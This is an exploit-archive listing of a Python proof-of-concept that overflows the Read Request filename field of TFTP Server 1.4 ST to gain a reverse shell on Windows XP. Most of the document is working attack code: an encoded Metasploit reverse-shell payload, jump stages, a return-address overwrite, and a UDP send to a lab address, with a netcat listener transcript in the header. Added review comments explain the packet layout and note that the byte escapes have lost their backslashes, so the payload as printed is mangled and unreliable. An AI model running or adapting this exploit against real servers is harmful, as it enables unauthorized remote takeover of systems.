
# Title : TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit
# Published : 2012-01-10
# Author :
# Previous Title : Sysax Multi Server 5.50 Create Folder BOF
# Next Title : McAfee SaaS MyCioScan ShowReport Remote Command Execution


#!/usr/bin/python

#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #
# OS: Windows XP PRO SP3                                                    #
# Author: b33f                                                              #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise...                                #
#                                                                           #
# This tftp service has been pwned extensively:                             #
# (1) Muts ==> WRQ Overflow                                                 #
#     http://www.exploit-db.com/exploits/5314/                              #
# (2) Molotov ==> WRQ Overflow                                              #
#     http://www.exploit-db.com/exploits/10542/                             #
# (3) tixxDZ ==> ERROR Overflow                                             #
#     http://www.exploit-db.com/exploits/5563/                              #
#                                                                           #
# Vulnerable software:                                                      #
# http://www.exploit-db.com/application/5314/                               #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read     #
# Request (RRQ) packet can also trigger a buffer overflow...                #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear  #
# as expected....                                                           #
#                                                                           #
# root@bt:~# nc -lvp 9988                                                   #
# listening on [any] 9988 ...                                               #
# 192.168.111.128: inverse host lookup failed: Unknown server error         #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Program Files\TFTPServer>                                              #
#---------------------------------------------------------------------------#

import socket
import sys

# Target of this proof-of-concept: the address the single datagram below is
# sent to.  Port 69 is the standard TFTP port (RFC 1350).
host = '192.168.111.128'
port = 69

# TFTP runs over UDP, hence SOCK_DGRAM.  The bare `except:` also swallows
# KeyboardInterrupt/SystemExit; `except socket.error` would be the narrow form.
try:
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      
except:
      print "socket() failed"
      sys.exit(1)

#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
# Encoded payload blob (341 bytes per the msfencode note above; the file
# header describes it as a reverse shell to port 9988).
# NOTE(review): as rendered in this listing the byte escapes have lost their
# backslashes, so these literals are plain ASCII text rather than the byte
# values the author intended; the same applies to every "x.." string below.
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")

#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR                               #
#             => 3-byte overwrite using the mandatory protocol null-byte.   #
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump.  #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.          #
# (4) Stage4: reverse shell port 9988 - size 341                            #
#---------------------------------------------------------------------------#

# The four pieces of the overflow buffer, named back to front as in the
# table above: stage4 is a 50-byte NOP sled in front of the payload, stage3
# and stage2 are the two backward jumps, and stage1 is the 3-byte return
# address whose 4th byte the protocol's own NUL terminator supplies.
stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"

# Everything rides in the RRQ "filename" field: the sled/payload padded out
# to 1487 bytes, then the jump stages and the address overwrite.  A filename
# of this length is far beyond anything a legitimate client sends, which is
# the natural thing for the server's input check (bound the field before
# copying it) or an IDS rule on UDP/69 to reject.
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1


# TFTP request layout: 2-byte opcode (0x0001 = Read Request), filename,
# NUL, transfer mode, NUL.  "netascii" is one of the two standard modes.
mode = "netascii"
youlose = "x00x01" + filename + "x00" + mode + "x00"
# Single fire-and-forget datagram: nothing is read back, so the script gives
# no indication of whether the service crashed or merely ignored the request.
s.sendto(youlose, (host, port))